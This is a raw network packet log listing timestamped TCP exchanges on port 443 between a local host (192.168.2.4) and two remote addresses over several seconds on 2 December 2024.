                                                          Dec 2, 2024 17:56:12.608499050 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.608504057 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.611278057 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.611316919 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.611397028 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.611552954 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.611563921 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.796664000 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.796727896 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.796802044 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.797003031 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.797019005 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.797034979 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.797043085 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.799884081 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.799916983 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.800008059 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.800163984 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.800174952 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.804424047 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.804481983 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.804522991 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.804615021 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.804626942 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.804635048 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.804640055 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.806642056 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.806667089 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.806744099 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.806870937 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.806884050 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.823496103 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.823554039 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.823600054 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.823692083 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.823699951 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.823709965 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.823714018 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.825565100 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.825584888 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.825654984 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.825788975 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.825802088 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.855478048 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.855530977 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.855585098 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.855681896 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.855705023 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.855715036 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.855719090 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.857642889 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.857655048 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.857733011 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.857861996 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.857870102 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:13.521785021 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:13.521833897 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:13.521934032 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:13.522176027 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:13.522188902 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:14.626513004 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.627042055 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.627059937 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.627621889 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.627628088 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.631505966 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.631858110 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.631881952 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.632376909 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.632381916 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.641711950 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.642005920 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.642014980 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.642513037 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.642518997 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.650074959 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.650352955 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.650372028 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:14.650865078 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:14.650870085 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.076875925 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.076945066 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.077096939 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.077203035 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.077224016 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.077234983 CET49792443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.077244997 CET4434979213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.078381062 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.078454971 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.078507900 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.078604937 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.078623056 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.078635931 CET49793443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.078644037 CET4434979313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.080135107 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.080171108 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.080266953 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.080389023 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.080400944 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.080552101 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.080598116 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.080651999 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.080806971 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.080821991 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.096518993 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.096599102 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.096796989 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.096863985 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.096869946 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.096882105 CET49794443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.096894979 CET4434979413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.099328041 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.099340916 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.099401951 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.099514961 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.099525928 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.108895063 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.108944893 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.108992100 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.109186888 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.109186888 CET49791443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.109205961 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.109215975 CET4434979113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.110959053 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.110980034 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.111047983 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.111179113 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:15.111191988 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:15.241286039 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:15.241702080 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:15.241718054 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:15.242075920 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:15.242377043 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:15.242439985 CET44349795142.250.181.100192.168.2.4
                                                          Dec 2, 2024 17:56:15.286324024 CET49795443192.168.2.4142.250.181.100
                                                          Dec 2, 2024 17:56:16.875602007 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.876487970 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.876517057 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.876935005 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.876940012 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.879581928 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.880387068 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.880409002 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.881753922 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.881763935 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.901231050 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.901798010 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.902216911 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.902218103 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.902226925 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.902247906 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.902537107 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.902542114 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:16.903640032 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:16.903644085 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.326256990 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.326328993 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.326383114 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.326694965 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.326694965 CET49796443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.326709986 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.326716900 CET4434979613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.329015970 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.329050064 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.329121113 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.329267025 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.329278946 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.330580950 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.330643892 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.330728054 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.330761909 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.330782890 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.330796003 CET49797443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.330801964 CET4434979713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.332906008 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.332937002 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.333022118 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.333185911 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.333195925 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.345550060 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.345607042 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.345653057 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.345805883 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.345805883 CET49799443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.345813990 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.345820904 CET4434979913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.348079920 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.348094940 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.348176956 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.348315954 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.348326921 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.350095034 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.350152969 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.350202084 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.350279093 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.350285053 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.350294113 CET49798443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.350297928 CET4434979813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.352077007 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.352108002 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:17.352170944 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.352305889 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:17.352317095 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.043612003 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.044085979 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.044112921 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.044558048 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.044565916 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.051002026 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.051280022 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.051316023 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.051632881 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.051640034 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.063616037 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.063973904 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.063988924 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.064564943 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.064570904 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.083050013 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.083550930 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.083560944 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.083956957 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.083961964 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.479316950 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.479388952 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.479440928 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.479660988 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.479681015 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.479691982 CET49800443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.479697943 CET4434980013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.484147072 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.484184980 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.484268904 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.484455109 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.484467030 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.488661051 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.488720894 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.488769054 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.489041090 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.489056110 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.489088058 CET49801443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.489093065 CET4434980113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.493323088 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.493362904 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.493448973 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.493690968 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.493705034 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.501010895 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.501061916 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.501108885 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.501244068 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.501251936 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.501261950 CET49802443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.501265049 CET4434980213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.504499912 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.504509926 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.504576921 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.504697084 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.504707098 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.521519899 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.521578074 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.521719933 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.521740913 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.521740913 CET49803443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.521747112 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.521754026 CET4434980313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.525336027 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.525348902 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:19.525424004 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.525547981 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:19.525558949 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.280313969 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.281124115 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.281147957 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.282574892 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.282582998 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.315124989 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.315774918 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.315783024 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.317040920 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.317044973 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.338514090 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.338938951 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.338964939 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.340101957 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.340107918 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.383793116 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.384289026 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.384309053 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.385565996 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.385571957 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.725744009 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.725811958 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.725970984 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.726560116 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.726583004 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.726615906 CET49804443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.726622105 CET4434980413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.731368065 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.731414080 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.731486082 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.731668949 CET49808443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.731683969 CET4434980813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.753974915 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.754524946 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.754554987 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.755827904 CET49790443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.755834103 CET4434979013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.759655952 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.759712934 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.759762049 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.760003090 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.760008097 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.760018110 CET49806443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.760020971 CET4434980613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.762939930 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.762979984 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.763042927 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.763169050 CET49809443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.763181925 CET4434980913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.792072058 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.792130947 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.792171001 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.792514086 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.792536974 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.792557955 CET49805443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.792566061 CET4434980513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.796313047 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.796339035 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.796403885 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.796737909 CET49810443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.796752930 CET4434981013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.837219000 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.837282896 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.837354898 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.837553024 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.837567091 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.837575912 CET49807443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.837579966 CET4434980713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.841768980 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.841782093 CET4434981113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:21.841871977 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.842077017 CET49811443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:21.842087984 CET4434981113.107.246.63192.168.2.4
